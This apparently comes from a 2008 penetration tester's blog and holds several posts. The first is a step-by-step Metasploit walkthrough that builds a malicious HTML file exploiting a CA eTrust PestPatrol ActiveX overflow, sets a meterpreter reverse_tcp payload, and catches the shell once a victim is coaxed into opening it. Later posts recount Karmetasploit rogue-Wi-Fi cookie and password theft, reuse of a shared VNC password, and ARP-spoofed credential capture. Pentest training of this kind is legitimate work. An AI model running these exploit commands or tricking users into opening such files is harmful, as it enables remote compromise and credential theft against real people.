http://www.sensepost.com/research/reDuh/

expect some more info soon.

Metasploit and File Format Bugs

2008-08-23T22:25:00.006-04:00

Client-side attacks are where its at and being able to send a legitimate looking file to a user to do their double-clicky thing on is the bomb.

MC has released a FileFormat mixin for metasploit which allows you to exploit fun bugs like 08-011 and other bugs that involve a user opening some sort of attachment.

Here is the link the fileformat mixin
http://www.metasploit.com/users/mc/rand/fileformat.rb

To use it, you need to add:

require 'msf/core/exploit/fileformat' to msf3/lib/msf/core/exploit.rb

and stick fileformat.rb in the msf3/lib/msf/core/exploit/ directory

Now remembering my previous post on adding exploits to metasploit we can do the same for mixins.

so my exploit.rb file actually said:

require '/home/cg/.msf3/lib/msf/core/exploit/fileformat'

And don't worry, if you jacked something up Metasploit will let you know.

cg@WPAD:~/evil/msf3$ ./msfconsole
./lib/msf/core/exploit.rb:241:in `require': no such file to load --
/home/cg/.msf3/lib/msf/core/exploit/fileformat (LoadError)

For our example we'll use a vulnerability in the ActiveX control for eTrust PestScan
http://www.metasploit.com/users/mc/rand/etrust_pestscan.rb

From the description in the module:

This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.

Example Time!

msf > use exploit/windows/fileformat/etrust_pestscan
msf exploit(etrust_pestscan) > info

Name: CA eTrust PestPatrol ActiveX Control Buffer Overflow
Version: $Revision:$
Platform: Windows
Privileged: No
License: Metasploit Framework License

Provided by:
MC

Available targets:
Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.

Payload information:
Space: 1024
Avoid: 1 characters

Description:
This module exploits a stack overflow in CA eTrust PestPatrol. When
sending an overly long string to the Initialize() property of
ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary
code. This control is not marked safe for scripting, so choose your
attack vector accordingly.

References:
http://www.w00t-shell.net/#
http://www.my-etrust.com/Extern/RoadRunner/PestScan/scan.htm

msf exploit(etrust_pestscan) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME MSF no The file name.

Exploit target:

Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > set FILENAME DEMO.html
FILENAME => DEMO.html
msf exploit(etrust_pestscan) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(etrust_pestscan) > set LHOST 192.168.0.101
LHOST => 192.168.0.101
msf exploit(etrust_pestscan) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME DEMO.html no The file name.

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
DLL /home/cg/evil/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 192.168.0.101 yes The local address
LPORT 4444 yes The local port

Exploit target:

Id Name
-- ----
0 Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7

msf exploit(etrust_pestscan) > exploit
[*] Started reverse handler
[*] Creating HTML file ...
[*] File is located in ./data/exploits/ ...
msf exploit(etrust_pestscan) >

Fileformat bugs are going to you to require to run the multi/handler so you can catch the return shells.

cg@WPAD:~/evil/msf3$ ./msfcli

Usage: ./msfcli [mode]
====================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module

cg@WPAD:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler...

***Work your magic to get the client to open the html file***

[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.0.101:4444 -> 192.168.0.103:4360)

meterpreter >

Shared Passwords Giving Up The Goods

2008-08-21T14:23:00.006-04:00

Shared passwords, especially shared VNC password remind me of the straw house from the three little pigs...

In addition to the previous post on having the Domain Users group in the Enterprise Admins group (FTW!) on my last trip the organization had decided to use VNC for workstation management instead of Dameware/Remote Desktop.

Why? I have no idea. At least with RDP and Dameware you can force admins to use domain credentials to log in. But for whatever reason they had chose to use VNC on their workstations, servers used RDP. The VNC sessions were password protected

Well they had some sort of video feed linked to a webpage so people could watch the feeds from a single webpage. A simple right click on the feed properties showed an un-obfuscated VNC password (even had a check box that could have starred it out...oops). Surely the VNC properties for the feeds wouldn't be the same VNC for the workstations right? Wrong, they were. Game over. We could now log into all the workstations. We were already Enterprise Admin and could psexec into the workstations but screen shots of watching people read their email just look so much better during the outbrief :-)

Metasploit + Karma=Karmetasploit Part 2

2008-08-18T23:12:00.017-04:00

Ok, so we have everything up and running (first post) and waiting for some random person...err your lab wifi box to connect to Karmetasploit.

We take a look at our current network connection before airbase-ng starts doing its thing.

*Note the blistering connection I had at the hotel.

Now we take a look at some of the available APs after airbase-ng starts doing its thing.

And lastly my computer connected to the hhonors AP

After that we open up our browser and try to go to google.com and we get the portal page that karmetasploit presents.

But as soon as we click enter or try to browse to a different URL a whole bunch of iframes start doing their thing trying to do the cookie theft and exploitation. You can see it in the bottom left corner.

Here we can see the result of ipconfig /all and see that my DHCP Server and DNS server is from karmetasploit.

A shot of airbase-ng doing its thing

Iphones connecting up

Cookie theft

POP password gathering

I saw the SMB Relay attack attempted a couple of times but I didnt see any of the other client side attacks being launched. Not sure what the issue is. I'm going to try it with a known vulnerable version of IE6 and see if I can get some better results. First instinct is that the browser enumeration code in browswer_autopwn isnt working quite right therefore not sending and clients sides out, but I could be wrong.

That's it for now.

Day in the life of pentester #4

2008-08-18T09:14:00.004-04:00

Day in the life of a pentester.

This one is short and sweet. Some things you probably shouldn't do.

1. fail use clear text protocols
2. get caught not following your own password policies
& the best one
3. add your Domain Users group to the Enterprise Admins group...oops ;-)

Internal test, some simple ARP Spoofing and LDAP query caught in plain text, RDP in, create a user account and add them to the appropriate admin group...done.

Defcon Thoughts

2008-08-17T00:10:00.003-04:00

Everyone else (g0ne, ncircle, terminal23) is doing their thoughts on Defcon so I figured I would too. I've been waiting on a couple of people to actually post the code they talked about but I'm growing impatient and I guess I can use the release for other posts.

Let's start with the Cons:
-The Badges...oops that sucked...least not getting one when I first paid, the blinky lights were cool. At least mine worked this year.
-The stench...oops that stunk...like rotting corpse bad.
-The Goons...hmmm what to say...I know you have a tough job with crowd control and whatnot but do you really have to talk to everyone like they are assholes? I'm not sure you have a reason to be screaming at 11am Friday morning, save that shit for Sunday.
-The Crowds...sucks...that narrow ass hallway combined with the stench = no fun
-The Talks...I didn't care for most of the talks (maybe I just picked bad), of course there were a few good ones, but props to everyone that submitted a paper and stood up there in front of a ton of people. I think the boss is convinced to do BH next year, everyone I talked to that went to BH was pleased with the talks.

The Pros:
-The Parties...303, hackerpimps, securabit/i-hacker, offensive computing, freakshow, i-sight, core impact, etc
-The People...not the crowds but getting to meet in person people I talk to online all the time...regrets...not making it to the security twits meetup.
-The CTF...I had people explain a to me a little better than last year what the hell is actually going on. Pretty interesting.
-The Guitar Hero competition...fun!
-The Swag...my green/black defcon coffee cup rulez.
-The Twitter(ing)...very cool watch the twits in real time during talks...mvp to jjx for most tweets or twits or whatever they are called.

I'll do a separate post on the talks I thought stood out at Defcon.

Crash Course In Penetration Testing Workshop at Toorcon

2008-08-15T21:11:00.004-04:00

Joe and I will be conducting our Crash Course In Penetration Testing Workshop at Toorcon in September.

http://sandiego.toorcon.org/content/section/4/8/

Description

Instructors: Joseph McCray & Chris Gates
Includes: 250GB 2.5" USB Harddrive preloaded with lab VMWare images

This course will cover some of the newer aspects of pen-testing covering; Open Source Intelligence Gathering with Maltego and other Open Source tools, Scanning, Enumeration, Exploitation (Both remote and client-side) and Post-Exploitation relying heavily on the features included in the Metasploit Framework. We'll discuss our activities from both the Whitebox and Blackbox approach keeping stealth in mind for our Blackbox activities.

Web Application penetration testing will be covered as well with focus on practical exploitation of cross-site scripting (XSS), cross-site request forgery (CSRF), local/remote file includes, and SQL Injection.

The course will come with a complementary USB Harddrive loaded with the lab Virtual Machine images for you to play with so you can continue to hone your skills and learn new techniques even after the course is finished. Attendees will walk away with a current knowledge of how to pen-test both a network and a web application, all of the basic tools needed, and a set of practice exercises that they can use to improve their skills.